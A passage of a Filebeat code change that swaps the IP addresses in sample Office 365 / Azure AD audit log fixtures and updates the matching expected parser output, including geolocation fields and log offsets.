Portal","Type":1},{"ID":"00000006-0000-0ff1-ce00-000000000000","Type":2},{"ID":"User_21119711-1517-43d4-8138-b537dafad016","Type":2},{"ID":"21119711-1517-43d4-8138-b537dafad016","Type":2},{"ID":"User","Type":2}],"ActorContextId":"48622b8f-44d3-420c-b4a2-510c8165767e","ActorIpAddress":"20.190.129.100","InterSystemsId":"ba292e5a-eb25-4c5e-950f-d56d9b92e5e3","IntraSystemId":"60feb7be-1cc1-410a-b9b5-d419e4882844","SupportTicketId":"","Target":[{"ID":"User_6d4ca534-c337-474d-8c76-6c715b31bc52","Type":2},{"ID":"6d4ca534-c337-474d-8c76-6c715b31bc52","Type":2},{"ID":"User","Type":2},{"ID":"newuser@testsiem4.onmicrosoft.com","Type":5},{"ID":"10032001131B9761","Type":3}],"TargetContextId":"48622b8f-44d3-420c-b4a2-510c8165767e"} -{"CreationTime":"2021-02-04T16:32:42","Id":"fa3a0492-4781-412a-b27e-2c23c15e542e","Operation":"Update 
user.","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":8,"ResultStatus":"Success","UserKey":"1003200112EB07E6@testsiem4.onmicrosoft.com","UserType":0,"Version":1,"Workload":"AzureActiveDirectory","ClientIP":"52.109.68.40","ObjectId":"newuser@testsiem4.onmicrosoft.com","UserId":"root@testsiem4.onmicrosoft.com","AzureActiveDirectoryEventType":1,"ExtendedProperties":[{"Name":"additionalDetails","Value":"{\"UserType\":\"Member\",\"User-Agent\":\"Microsoft Azure Graph Client Library 1.0\"}"},{"Name":"extendedAuditEventCategory","Value":"User"}],"ModifiedProperties":[{"Name":"Included Updated Properties","NewValue":"","OldValue":""},{"Name":"ActorId.ServicePrincipalNames","NewValue":"00000006-0000-0ff1-ce00-000000000000\/portal.microsoftonline.com;00000006-0000-0ff1-ce00-000000000000;https:\/\/sukportal.office.com;https:\/\/ejpportal.office.com;https:\/\/easportal.office.com;https:\/\/wusportal.office.com;https:\/\/seaportal.office.com;https:\/\/scuportal.office.com;https:\/\/eusportal.office.com;https:\/\/weuportal.office.com;https:\/\/ncuportal.office.com;https:\/\/ncuportalprv.office.com;https:\/\/scuportalprv.office.com;https:\/\/cp.portal.office.com\/;https:\/\/portal.office.com\/;https:\/\/portal-sdf.office.com\/;https:\/\/portal.office.com;https:\/\/auth.microsoftonline.com;https:\/\/wusportalprv.office.com;https:\/\/admin.microsoft.com;https:\/\/portal.microsoft.com;https:\/\/portal.office365.us;https:\/\/portal.office365.us\/;https:\/\/portal-sdf.office365.us;https:\/\/portal-sdf.office365.us\/;https:\/\/portal.apps.mil;https:\/\/portal.apps.mil\/;https:\/\/portal-sdf.apps.mil;https:\/\/portal-sdf.apps.mil\/;https:\/\/admin.microsoft365.com;https:\/\/scuportalprv-staging.office.com;https:\/\/ncuportalprv-staging.office.com;https:\/\/admin-sdf.microsoft.com;https:\/\/admin-ignite.microsoft.com;https:\/\/wukportal.office.com\/","OldValue":""},{"Name":"SPN","NewValue":"00000006-0000-0ff1-ce00-000000000000\/portal.microsoftonline.com;00000006-000
0-0ff1-ce00-000000000000;https:\/\/sukportal.office.com;https:\/\/ejpportal.office.com;https:\/\/easportal.office.com;https:\/\/wusportal.office.com;https:\/\/seaportal.office.com;https:\/\/scuportal.office.com;https:\/\/eusportal.office.com;https:\/\/weuportal.office.com;https:\/\/ncuportal.office.com;https:\/\/ncuportalprv.office.com;https:\/\/scuportalprv.office.com;https:\/\/cp.portal.office.com\/;https:\/\/portal.office.com\/;https:\/\/portal-sdf.office.com\/;https:\/\/portal.office.com;https:\/\/auth.microsoftonline.com;https:\/\/wusportalprv.office.com;https:\/\/admin.microsoft.com;https:\/\/portal.microsoft.com;https:\/\/portal.office365.us;https:\/\/portal.office365.us\/;https:\/\/portal-sdf.office365.us;https:\/\/portal-sdf.office365.us\/;https:\/\/portal.apps.mil;https:\/\/portal.apps.mil\/;https:\/\/portal-sdf.apps.mil;https:\/\/portal-sdf.apps.mil\/;https:\/\/admin.microsoft365.com;https:\/\/scuportalprv-staging.office.com;https:\/\/ncuportalprv-staging.office.com;https:\/\/admin-sdf.microsoft.com;https:\/\/admin-ignite.microsoft.com;https:\/\/wukportal.office.com\/","OldValue":""},{"Name":"TargetId.UserType","NewValue":"Member","OldValue":""}],"Actor":[{"ID":"root@testsiem4.onmicrosoft.com","Type":5},{"ID":"1003200112EB07E6","Type":3},{"ID":"Microsoft Office 365 
Portal","Type":1},{"ID":"00000006-0000-0ff1-ce00-000000000000","Type":2},{"ID":"User_21119711-1517-43d4-8138-b537dafad016","Type":2},{"ID":"21119711-1517-43d4-8138-b537dafad016","Type":2},{"ID":"User","Type":2}],"ActorContextId":"48622b8f-44d3-420c-b4a2-510c8165767e","ActorIpAddress":"52.109.68.40","InterSystemsId":"84246598-0c5b-4efc-b596-6b8e816c07f8","IntraSystemId":"7ac51b77-568d-4c36-a7c2-dc8d964e446e","SupportTicketId":"","Target":[{"ID":"User_6d4ca534-c337-474d-8c76-6c715b31bc52","Type":2},{"ID":"6d4ca534-c337-474d-8c76-6c715b31bc52","Type":2},{"ID":"User","Type":2},{"ID":"newuser@testsiem4.onmicrosoft.com","Type":5},{"ID":"10032001131B9761","Type":3}],"TargetContextId":"48622b8f-44d3-420c-b4a2-510c8165767e"} -{"CreationTime":"2021-02-04T16:32:42","Id":"608f941b-1724-49d9-b2f2-7c97898270f0","Operation":"Update StsRefreshTokenValidFrom Timestamp.","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":8,"ResultStatus":"Success","UserKey":"1003200112EB07E6@testsiem4.onmicrosoft.com","UserType":0,"Version":1,"Workload":"AzureActiveDirectory","ClientIP":"52.109.68.40","ObjectId":"newuser@testsiem4.onmicrosoft.com","UserId":"root@testsiem4.onmicrosoft.com","AzureActiveDirectoryEventType":1,"ExtendedProperties":[{"Name":"additionalDetails","Value":"{\"User-Agent\":\"Microsoft Azure Graph Client Library 1.0\"}"},{"Name":"extendedAuditEventCategory","Value":"User"}],"ModifiedProperties":[{"Name":"Included Updated 
Properties","NewValue":"","OldValue":""},{"Name":"ActorId.ServicePrincipalNames","NewValue":"00000006-0000-0ff1-ce00-000000000000\/portal.microsoftonline.com;00000006-0000-0ff1-ce00-000000000000;https:\/\/sukportal.office.com;https:\/\/ejpportal.office.com;https:\/\/easportal.office.com;https:\/\/wusportal.office.com;https:\/\/seaportal.office.com;https:\/\/scuportal.office.com;https:\/\/eusportal.office.com;https:\/\/weuportal.office.com;https:\/\/ncuportal.office.com;https:\/\/ncuportalprv.office.com;https:\/\/scuportalprv.office.com;https:\/\/cp.portal.office.com\/;https:\/\/portal.office.com\/;https:\/\/portal-sdf.office.com\/;https:\/\/portal.office.com;https:\/\/auth.microsoftonline.com;https:\/\/wusportalprv.office.com;https:\/\/admin.microsoft.com;https:\/\/portal.microsoft.com;https:\/\/portal.office365.us;https:\/\/portal.office365.us\/;https:\/\/portal-sdf.office365.us;https:\/\/portal-sdf.office365.us\/;https:\/\/portal.apps.mil;https:\/\/portal.apps.mil\/;https:\/\/portal-sdf.apps.mil;https:\/\/portal-sdf.apps.mil\/;https:\/\/admin.microsoft365.com;https:\/\/scuportalprv-staging.office.com;https:\/\/ncuportalprv-staging.office.com;https:\/\/admin-sdf.microsoft.com;https:\/\/admin-ignite.microsoft.com;https:\/\/wukportal.office.com\/","OldValue":""},{"Name":"SPN","NewValue":"00000006-0000-0ff1-ce00-000000000000\/portal.microsoftonline.com;00000006-0000-0ff1-ce00-000000000000;https:\/\/sukportal.office.com;https:\/\/ejpportal.office.com;https:\/\/easportal.office.com;https:\/\/wusportal.office.com;https:\/\/seaportal.office.com;https:\/\/scuportal.office.com;https:\/\/eusportal.office.com;https:\/\/weuportal.office.com;https:\/\/ncuportal.office.com;https:\/\/ncuportalprv.office.com;https:\/\/scuportalprv.office.com;https:\/\/cp.portal.office.com\/;https:\/\/portal.office.com\/;https:\/\/portal-sdf.office.com\/;https:\/\/portal.office.com;https:\/\/auth.microsoftonline.com;https:\/\/wusportalprv.office.com;https:\/\/admin.microsoft.com;https:\/\/portal.mi
crosoft.com;https:\/\/portal.office365.us;https:\/\/portal.office365.us\/;https:\/\/portal-sdf.office365.us;https:\/\/portal-sdf.office365.us\/;https:\/\/portal.apps.mil;https:\/\/portal.apps.mil\/;https:\/\/portal-sdf.apps.mil;https:\/\/portal-sdf.apps.mil\/;https:\/\/admin.microsoft365.com;https:\/\/scuportalprv-staging.office.com;https:\/\/ncuportalprv-staging.office.com;https:\/\/admin-sdf.microsoft.com;https:\/\/admin-ignite.microsoft.com;https:\/\/wukportal.office.com\/","OldValue":""}],"Actor":[{"ID":"root@testsiem4.onmicrosoft.com","Type":5},{"ID":"1003200112EB07E6","Type":3},{"ID":"Microsoft Office 365 Portal","Type":1},{"ID":"00000006-0000-0ff1-ce00-000000000000","Type":2},{"ID":"User_21119711-1517-43d4-8138-b537dafad016","Type":2},{"ID":"21119711-1517-43d4-8138-b537dafad016","Type":2},{"ID":"User","Type":2}],"ActorContextId":"48622b8f-44d3-420c-b4a2-510c8165767e","ActorIpAddress":"52.109.68.40","InterSystemsId":"84246598-0c5b-4efc-b596-6b8e816c07f8","IntraSystemId":"7ac51b77-568d-4c36-a7c2-dc8d964e446e","SupportTicketId":"","Target":[{"ID":"User_6d4ca534-c337-474d-8c76-6c715b31bc52","Type":2},{"ID":"6d4ca534-c337-474d-8c76-6c715b31bc52","Type":2},{"ID":"User","Type":2},{"ID":"newuser@testsiem4.onmicrosoft.com","Type":5},{"ID":"10032001131B9761","Type":3}],"TargetContextId":"48622b8f-44d3-420c-b4a2-510c8165767e"} +{"CreationTime":"2021-02-04T16:31:54","Id":"82693d84-baef-46a1-8b47-6a203ce7c75f","Operation":"Add member to 
role.","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":8,"ResultStatus":"Success","UserKey":"1003200112EB07E6@testsiem4.onmicrosoft.com","UserType":0,"Version":1,"Workload":"AzureActiveDirectory","ClientIP":"81.2.69.145","ObjectId":"newuser@testsiem4.onmicrosoft.com","UserId":"root@testsiem4.onmicrosoft.com","AzureActiveDirectoryEventType":1,"ExtendedProperties":[{"Name":"additionalDetails","Value":"{}"},{"Name":"extendedAuditEventCategory","Value":"Role"}],"ModifiedProperties":[{"Name":"Role.ObjectID","NewValue":"79bcbf54-dbd5-4fcc-8bf2-ab789e9a97da","OldValue":""},{"Name":"Role.DisplayName","NewValue":"Helpdesk Administrator","OldValue":""},{"Name":"Role.TemplateId","NewValue":"729827e3-9c14-49f7-bb1b-9608f156bbb8","OldValue":""},{"Name":"Role.WellKnownObjectName","NewValue":"HelpdeskAdmins","OldValue":""}],"Actor":[{"ID":"root@testsiem4.onmicrosoft.com","Type":5},{"ID":"1003200112EB07E6","Type":3},{"ID":"Microsoft Office 365 Portal","Type":1},{"ID":"00000006-0000-0ff1-ce00-000000000000","Type":2},{"ID":"User_21119711-1517-43d4-8138-b537dafad016","Type":2},{"ID":"21119711-1517-43d4-8138-b537dafad016","Type":2},{"ID":"User","Type":2}],"ActorContextId":"48622b8f-44d3-420c-b4a2-510c8165767e","ActorIpAddress":"81.2.69.145","InterSystemsId":"ba292e5a-eb25-4c5e-950f-d56d9b92e5e3","IntraSystemId":"60feb7be-1cc1-410a-b9b5-d419e4882844","SupportTicketId":"","Target":[{"ID":"User_6d4ca534-c337-474d-8c76-6c715b31bc52","Type":2},{"ID":"6d4ca534-c337-474d-8c76-6c715b31bc52","Type":2},{"ID":"User","Type":2},{"ID":"newuser@testsiem4.onmicrosoft.com","Type":5},{"ID":"10032001131B9761","Type":3}],"TargetContextId":"48622b8f-44d3-420c-b4a2-510c8165767e"} +{"CreationTime":"2021-02-04T16:32:42","Id":"fa3a0492-4781-412a-b27e-2c23c15e542e","Operation":"Update 
user.","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":8,"ResultStatus":"Success","UserKey":"1003200112EB07E6@testsiem4.onmicrosoft.com","UserType":0,"Version":1,"Workload":"AzureActiveDirectory","ClientIP":"67.43.156.15","ObjectId":"newuser@testsiem4.onmicrosoft.com","UserId":"root@testsiem4.onmicrosoft.com","AzureActiveDirectoryEventType":1,"ExtendedProperties":[{"Name":"additionalDetails","Value":"{\"UserType\":\"Member\",\"User-Agent\":\"Microsoft Azure Graph Client Library 1.0\"}"},{"Name":"extendedAuditEventCategory","Value":"User"}],"ModifiedProperties":[{"Name":"Included Updated Properties","NewValue":"","OldValue":""},{"Name":"ActorId.ServicePrincipalNames","NewValue":"00000006-0000-0ff1-ce00-000000000000\/portal.microsoftonline.com;00000006-0000-0ff1-ce00-000000000000;https:\/\/sukportal.office.com;https:\/\/ejpportal.office.com;https:\/\/easportal.office.com;https:\/\/wusportal.office.com;https:\/\/seaportal.office.com;https:\/\/scuportal.office.com;https:\/\/eusportal.office.com;https:\/\/weuportal.office.com;https:\/\/ncuportal.office.com;https:\/\/ncuportalprv.office.com;https:\/\/scuportalprv.office.com;https:\/\/cp.portal.office.com\/;https:\/\/portal.office.com\/;https:\/\/portal-sdf.office.com\/;https:\/\/portal.office.com;https:\/\/auth.microsoftonline.com;https:\/\/wusportalprv.office.com;https:\/\/admin.microsoft.com;https:\/\/portal.microsoft.com;https:\/\/portal.office365.us;https:\/\/portal.office365.us\/;https:\/\/portal-sdf.office365.us;https:\/\/portal-sdf.office365.us\/;https:\/\/portal.apps.mil;https:\/\/portal.apps.mil\/;https:\/\/portal-sdf.apps.mil;https:\/\/portal-sdf.apps.mil\/;https:\/\/admin.microsoft365.com;https:\/\/scuportalprv-staging.office.com;https:\/\/ncuportalprv-staging.office.com;https:\/\/admin-sdf.microsoft.com;https:\/\/admin-ignite.microsoft.com;https:\/\/wukportal.office.com\/","OldValue":""},{"Name":"SPN","NewValue":"00000006-0000-0ff1-ce00-000000000000\/portal.microsoftonline.com;00000006-000
0-0ff1-ce00-000000000000;https:\/\/sukportal.office.com;https:\/\/ejpportal.office.com;https:\/\/easportal.office.com;https:\/\/wusportal.office.com;https:\/\/seaportal.office.com;https:\/\/scuportal.office.com;https:\/\/eusportal.office.com;https:\/\/weuportal.office.com;https:\/\/ncuportal.office.com;https:\/\/ncuportalprv.office.com;https:\/\/scuportalprv.office.com;https:\/\/cp.portal.office.com\/;https:\/\/portal.office.com\/;https:\/\/portal-sdf.office.com\/;https:\/\/portal.office.com;https:\/\/auth.microsoftonline.com;https:\/\/wusportalprv.office.com;https:\/\/admin.microsoft.com;https:\/\/portal.microsoft.com;https:\/\/portal.office365.us;https:\/\/portal.office365.us\/;https:\/\/portal-sdf.office365.us;https:\/\/portal-sdf.office365.us\/;https:\/\/portal.apps.mil;https:\/\/portal.apps.mil\/;https:\/\/portal-sdf.apps.mil;https:\/\/portal-sdf.apps.mil\/;https:\/\/admin.microsoft365.com;https:\/\/scuportalprv-staging.office.com;https:\/\/ncuportalprv-staging.office.com;https:\/\/admin-sdf.microsoft.com;https:\/\/admin-ignite.microsoft.com;https:\/\/wukportal.office.com\/","OldValue":""},{"Name":"TargetId.UserType","NewValue":"Member","OldValue":""}],"Actor":[{"ID":"root@testsiem4.onmicrosoft.com","Type":5},{"ID":"1003200112EB07E6","Type":3},{"ID":"Microsoft Office 365 
Portal","Type":1},{"ID":"00000006-0000-0ff1-ce00-000000000000","Type":2},{"ID":"User_21119711-1517-43d4-8138-b537dafad016","Type":2},{"ID":"21119711-1517-43d4-8138-b537dafad016","Type":2},{"ID":"User","Type":2}],"ActorContextId":"48622b8f-44d3-420c-b4a2-510c8165767e","ActorIpAddress":"67.43.156.15","InterSystemsId":"84246598-0c5b-4efc-b596-6b8e816c07f8","IntraSystemId":"7ac51b77-568d-4c36-a7c2-dc8d964e446e","SupportTicketId":"","Target":[{"ID":"User_6d4ca534-c337-474d-8c76-6c715b31bc52","Type":2},{"ID":"6d4ca534-c337-474d-8c76-6c715b31bc52","Type":2},{"ID":"User","Type":2},{"ID":"newuser@testsiem4.onmicrosoft.com","Type":5},{"ID":"10032001131B9761","Type":3}],"TargetContextId":"48622b8f-44d3-420c-b4a2-510c8165767e"} +{"CreationTime":"2021-02-04T16:32:42","Id":"608f941b-1724-49d9-b2f2-7c97898270f0","Operation":"Update StsRefreshTokenValidFrom Timestamp.","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":8,"ResultStatus":"Success","UserKey":"1003200112EB07E6@testsiem4.onmicrosoft.com","UserType":0,"Version":1,"Workload":"AzureActiveDirectory","ClientIP":"67.43.156.15","ObjectId":"newuser@testsiem4.onmicrosoft.com","UserId":"root@testsiem4.onmicrosoft.com","AzureActiveDirectoryEventType":1,"ExtendedProperties":[{"Name":"additionalDetails","Value":"{\"User-Agent\":\"Microsoft Azure Graph Client Library 1.0\"}"},{"Name":"extendedAuditEventCategory","Value":"User"}],"ModifiedProperties":[{"Name":"Included Updated 
Properties","NewValue":"","OldValue":""},{"Name":"ActorId.ServicePrincipalNames","NewValue":"00000006-0000-0ff1-ce00-000000000000\/portal.microsoftonline.com;00000006-0000-0ff1-ce00-000000000000;https:\/\/sukportal.office.com;https:\/\/ejpportal.office.com;https:\/\/easportal.office.com;https:\/\/wusportal.office.com;https:\/\/seaportal.office.com;https:\/\/scuportal.office.com;https:\/\/eusportal.office.com;https:\/\/weuportal.office.com;https:\/\/ncuportal.office.com;https:\/\/ncuportalprv.office.com;https:\/\/scuportalprv.office.com;https:\/\/cp.portal.office.com\/;https:\/\/portal.office.com\/;https:\/\/portal-sdf.office.com\/;https:\/\/portal.office.com;https:\/\/auth.microsoftonline.com;https:\/\/wusportalprv.office.com;https:\/\/admin.microsoft.com;https:\/\/portal.microsoft.com;https:\/\/portal.office365.us;https:\/\/portal.office365.us\/;https:\/\/portal-sdf.office365.us;https:\/\/portal-sdf.office365.us\/;https:\/\/portal.apps.mil;https:\/\/portal.apps.mil\/;https:\/\/portal-sdf.apps.mil;https:\/\/portal-sdf.apps.mil\/;https:\/\/admin.microsoft365.com;https:\/\/scuportalprv-staging.office.com;https:\/\/ncuportalprv-staging.office.com;https:\/\/admin-sdf.microsoft.com;https:\/\/admin-ignite.microsoft.com;https:\/\/wukportal.office.com\/","OldValue":""},{"Name":"SPN","NewValue":"00000006-0000-0ff1-ce00-000000000000\/portal.microsoftonline.com;00000006-0000-0ff1-ce00-000000000000;https:\/\/sukportal.office.com;https:\/\/ejpportal.office.com;https:\/\/easportal.office.com;https:\/\/wusportal.office.com;https:\/\/seaportal.office.com;https:\/\/scuportal.office.com;https:\/\/eusportal.office.com;https:\/\/weuportal.office.com;https:\/\/ncuportal.office.com;https:\/\/ncuportalprv.office.com;https:\/\/scuportalprv.office.com;https:\/\/cp.portal.office.com\/;https:\/\/portal.office.com\/;https:\/\/portal-sdf.office.com\/;https:\/\/portal.office.com;https:\/\/auth.microsoftonline.com;https:\/\/wusportalprv.office.com;https:\/\/admin.microsoft.com;https:\/\/portal.mi
crosoft.com;https:\/\/portal.office365.us;https:\/\/portal.office365.us\/;https:\/\/portal-sdf.office365.us;https:\/\/portal-sdf.office365.us\/;https:\/\/portal.apps.mil;https:\/\/portal.apps.mil\/;https:\/\/portal-sdf.apps.mil;https:\/\/portal-sdf.apps.mil\/;https:\/\/admin.microsoft365.com;https:\/\/scuportalprv-staging.office.com;https:\/\/ncuportalprv-staging.office.com;https:\/\/admin-sdf.microsoft.com;https:\/\/admin-ignite.microsoft.com;https:\/\/wukportal.office.com\/","OldValue":""}],"Actor":[{"ID":"root@testsiem4.onmicrosoft.com","Type":5},{"ID":"1003200112EB07E6","Type":3},{"ID":"Microsoft Office 365 Portal","Type":1},{"ID":"00000006-0000-0ff1-ce00-000000000000","Type":2},{"ID":"User_21119711-1517-43d4-8138-b537dafad016","Type":2},{"ID":"21119711-1517-43d4-8138-b537dafad016","Type":2},{"ID":"User","Type":2}],"ActorContextId":"48622b8f-44d3-420c-b4a2-510c8165767e","ActorIpAddress":"67.43.156.15","InterSystemsId":"84246598-0c5b-4efc-b596-6b8e816c07f8","IntraSystemId":"7ac51b77-568d-4c36-a7c2-dc8d964e446e","SupportTicketId":"","Target":[{"ID":"User_6d4ca534-c337-474d-8c76-6c715b31bc52","Type":2},{"ID":"6d4ca534-c337-474d-8c76-6c715b31bc52","Type":2},{"ID":"User","Type":2},{"ID":"newuser@testsiem4.onmicrosoft.com","Type":5},{"ID":"10032001131B9761","Type":3}],"TargetContextId":"48622b8f-44d3-420c-b4a2-510c8165767e"} {"CreationTime":"2021-02-04T16:33:17","Id":"1947bd7a-5b96-4bd5-931b-c12cc6ffdfcd","Operation":"Delete user.","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":8,"ResultStatus":"Success","UserKey":"1003200112EB07E6@testsiem4.onmicrosoft.com","UserType":0,"Version":1,"Workload":"AzureActiveDirectory","ClientIP":"","ObjectId":"6d4ca534c337474d8c766c715b31bc52newuser@testsiem4.onmicrosoft.com","UserId":"root@testsiem4.onmicrosoft.com","AzureActiveDirectoryEventType":1,"ExtendedProperties":[{"Name":"additionalDetails","Value":"{}"},{"Name":"extendedAuditEventCategory","Value":"User"}],"ModifiedProperties":[{"Name":"Is Hard 
Deleted","NewValue":"False","OldValue":""}],"Actor":[{"ID":"root@testsiem4.onmicrosoft.com","Type":5},{"ID":"1003200112EB07E6","Type":3},{"ID":"User_21119711-1517-43d4-8138-b537dafad016","Type":2},{"ID":"21119711-1517-43d4-8138-b537dafad016","Type":2},{"ID":"User","Type":2}],"ActorContextId":"48622b8f-44d3-420c-b4a2-510c8165767e","ActorIpAddress":"","InterSystemsId":"3e7b36e7-caba-4d7a-ae08-07f0a716135c","IntraSystemId":"995e2026-17cc-4599-8f63-b3f3556d784b","SupportTicketId":"","Target":[{"ID":"User_6d4ca534-c337-474d-8c76-6c715b31bc52","Type":2},{"ID":"6d4ca534-c337-474d-8c76-6c715b31bc52","Type":2},{"ID":"User","Type":2},{"ID":"6d4ca534c337474d8c766c715b31bc52newuser@testsiem4.onmicrosoft.com","Type":5},{"ID":"10032001131B9761","Type":3}],"TargetContextId":"48622b8f-44d3-420c-b4a2-510c8165767e"} {"CreationTime":"2021-02-04T16:33:14","Id":"4a27de4c-a2dd-4825-8f7f-6a623b3060ec","Operation":"Change user license.","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":8,"ResultStatus":"Success","UserKey":"1003200112EB07E6@testsiem4.onmicrosoft.com","UserType":0,"Version":1,"Workload":"AzureActiveDirectory","ClientIP":"","ObjectId":"newuser@testsiem4.onmicrosoft.com","UserId":"root@testsiem4.onmicrosoft.com","AzureActiveDirectoryEventType":1,"ExtendedProperties":[{"Name":"additionalDetails","Value":"{}"},{"Name":"extendedAuditEventCategory","Value":"User"}],"ModifiedProperties":[],"Actor":[{"ID":"root@testsiem4.onmicrosoft.com","Type":5},{"ID":"1003200112EB07E6","Type":3},{"ID":"User_21119711-1517-43d4-8138-b537dafad016","Type":2},{"ID":"21119711-1517-43d4-8138-b537dafad016","Type":2},{"ID":"User","Type":2}],"ActorContextId":"48622b8f-44d3-420c-b4a2-510c8165767e","ActorIpAddress":"","InterSystemsId":"443c61f9-900a-46cd-906f-7de2d16bd7b0","IntraSystemId":"74634e79-78c4-4335-8776-8afc267f5329","SupportTicketId":"","Target":[{"ID":"User_6d4ca534-c337-474d-8c76-6c715b31bc52","Type":2},{"ID":"6d4ca534-c337-474d-8c76-6c715b31bc52","Type":2},{"ID":"User","Type"
:2},{"ID":"newuser@testsiem4.onmicrosoft.com","Type":5},{"ID":"10032001131B9761","Type":3}],"TargetContextId":"48622b8f-44d3-420c-b4a2-510c8165767e"}
diff --git a/x-pack/filebeat/module/o365/audit/test/08-azuread-users.log-expected.json b/x-pack/filebeat/module/o365/audit/test/08-azuread-users.log-expected.json
index 2b9c5c2a0921..40efec8206dd 100644
--- a/x-pack/filebeat/module/o365/audit/test/08-azuread-users.log-expected.json
+++ b/x-pack/filebeat/module/o365/audit/test/08-azuread-users.log-expected.json
@@ -323,8 +323,8 @@
 },
 {
 "@timestamp": "2021-02-04T16:31:54.000Z",
- "client.address": "20.190.129.100",
- "client.ip": "20.190.129.100",
+ "client.address": "81.2.69.145",
+ "client.ip": "81.2.69.145",
 "event.action": "Add member to role.",
 "event.category": "web",
 "event.code": "AzureActiveDirectory",
@@ -372,9 +372,9 @@
 }
 ],
 "o365.audit.ActorContextId": "48622b8f-44d3-420c-b4a2-510c8165767e",
- "o365.audit.ActorIpAddress": "20.190.129.100",
+ "o365.audit.ActorIpAddress": "81.2.69.145",
 "o365.audit.AzureActiveDirectoryEventType": 1,
- "o365.audit.ClientIP": "20.190.129.100",
+ "o365.audit.ClientIP": "81.2.69.145",
 "o365.audit.CreationTime": "2021-02-04T16:31:54",
 "o365.audit.ExtendedProperties.additionalDetails": "{}",
 "o365.audit.ExtendedProperties.extendedAuditEventCategory": "Role",
@@ -424,20 +424,18 @@
 "o365.audit.Version": 1,
 "o365.audit.Workload": "AzureActiveDirectory",
 "organization.id": "48622b8f-44d3-420c-b4a2-510c8165767e",
- "related.ip": "20.190.129.100",
+ "related.ip": "81.2.69.145",
 "related.user": "root",
 "service.type": "o365",
- "source.as.number": 8075,
- "source.as.organization.name": "Microsoft Corporation",
- "source.geo.city_name": "Dublin",
+ "source.geo.city_name": "London",
 "source.geo.continent_name": "Europe",
- "source.geo.country_iso_code": "IE",
- "source.geo.country_name": "Ireland",
- "source.geo.location.lat": 53.3338,
- "source.geo.location.lon": -6.2488,
- "source.geo.region_iso_code": "IE-L",
- "source.geo.region_name": "Leinster",
- "source.ip": "20.190.129.100",
+ "source.geo.country_iso_code": "GB",
+ "source.geo.country_name": "United Kingdom",
+ "source.geo.location.lat": 51.5142,
+ "source.geo.location.lon": -0.0931,
+ "source.geo.region_iso_code": "GB-ENG",
+ "source.geo.region_name": "England",
+ "source.ip": "81.2.69.145",
 "tags": [
 "forwarded"
 ],
@@ -462,7 +460,7 @@
 "host.id": "48622b8f-44d3-420c-b4a2-510c8165767e",
 "host.name": "testsiem4.onmicrosoft.com",
 "input.type": "log",
- "log.offset": 29455,
+ "log.offset": 29449,
 "o365.audit.Actor": [
 {
 "ID": "21119711-1517-43d4-8138-b537dafad016",
@@ -554,7 +552,7 @@
 "host.id": "48622b8f-44d3-420c-b4a2-510c8165767e",
 "host.name": "testsiem4.onmicrosoft.com",
 "input.type": "log",
- "log.offset": 30817,
+ "log.offset": 30811,
 "o365.audit.Actor": [
 {
 "ID": "21119711-1517-43d4-8138-b537dafad016",
@@ -632,8 +630,8 @@
 },
 {
 "@timestamp": "2021-02-04T16:31:54.000Z",
- "client.address": "20.190.129.100",
- "client.ip": "20.190.129.100",
+ "client.address": "81.2.69.145",
+ "client.ip": "81.2.69.145",
 "event.action": "Add member to role.",
 "event.category": "web",
 "event.code": "AzureActiveDirectory",
@@ -648,7 +646,7 @@
 "host.id": "48622b8f-44d3-420c-b4a2-510c8165767e",
 "host.name": "testsiem4.onmicrosoft.com",
 "input.type": "log",
- "log.offset": 32157,
+ "log.offset": 32151,
 "network.type": "ipv4",
 "o365.audit.Actor": [
 {
@@ -681,9 +679,9 @@
 }
 ],
 "o365.audit.ActorContextId": "48622b8f-44d3-420c-b4a2-510c8165767e",
- "o365.audit.ActorIpAddress": "20.190.129.100",
+ "o365.audit.ActorIpAddress": "81.2.69.145",
 "o365.audit.AzureActiveDirectoryEventType": 1,
- "o365.audit.ClientIP": "20.190.129.100",
+ "o365.audit.ClientIP": "81.2.69.145",
 "o365.audit.CreationTime": "2021-02-04T16:31:54",
 "o365.audit.ExtendedProperties.additionalDetails": "{}",
 "o365.audit.ExtendedProperties.extendedAuditEventCategory": "Role",
@@ -733,20 +731,18 @@
 "o365.audit.Version": 1,
 "o365.audit.Workload": "AzureActiveDirectory",
 "organization.id": "48622b8f-44d3-420c-b4a2-510c8165767e",
- "related.ip": "20.190.129.100",
+ "related.ip": "81.2.69.145",
 "related.user": "root",
 "service.type": "o365",
- "source.as.number": 8075,
- "source.as.organization.name": "Microsoft Corporation",
- "source.geo.city_name": "Dublin",
+ "source.geo.city_name": "London",
 "source.geo.continent_name": "Europe",
- "source.geo.country_iso_code": "IE",
- "source.geo.country_name": "Ireland",
- "source.geo.location.lat": 53.3338,
- "source.geo.location.lon": -6.2488,
- "source.geo.region_iso_code": "IE-L",
- "source.geo.region_name": "Leinster",
- "source.ip": "20.190.129.100",
+ "source.geo.country_iso_code": "GB",
+ "source.geo.country_name": "United Kingdom",
+ "source.geo.location.lat": 51.5142,
+ "source.geo.location.lon": -0.0931,
+ "source.geo.region_iso_code": "GB-ENG",
+ "source.geo.region_name": "England",
+ "source.ip": "81.2.69.145",
 "tags": [
 "forwarded"
 ],
@@ -757,8 +753,8 @@
 },
 {
 "@timestamp": "2021-02-04T16:32:42.000Z",
- "client.address": "52.109.68.40",
- "client.ip": "52.109.68.40",
+ "client.address": "67.43.156.15",
+ "client.ip": "67.43.156.15",
 "event.action": "modified-user-account",
 "event.category": "iam",
 "event.code": "AzureActiveDirectory",
@@ -776,7 +772,7 @@
 "host.id": "48622b8f-44d3-420c-b4a2-510c8165767e",
 "host.name": "testsiem4.onmicrosoft.com",
 "input.type": "log",
- "log.offset": 33960,
+ "log.offset": 33948,
 "network.type": "ipv4",
 "o365.audit.Actor": [
 {
@@ -809,9 +805,9 @@
 }
 ],
 "o365.audit.ActorContextId": "48622b8f-44d3-420c-b4a2-510c8165767e",
- "o365.audit.ActorIpAddress": "52.109.68.40",
+ "o365.audit.ActorIpAddress": "67.43.156.15",
 "o365.audit.AzureActiveDirectoryEventType": 1,
- "o365.audit.ClientIP": "52.109.68.40",
+ "o365.audit.ClientIP": "67.43.156.15",
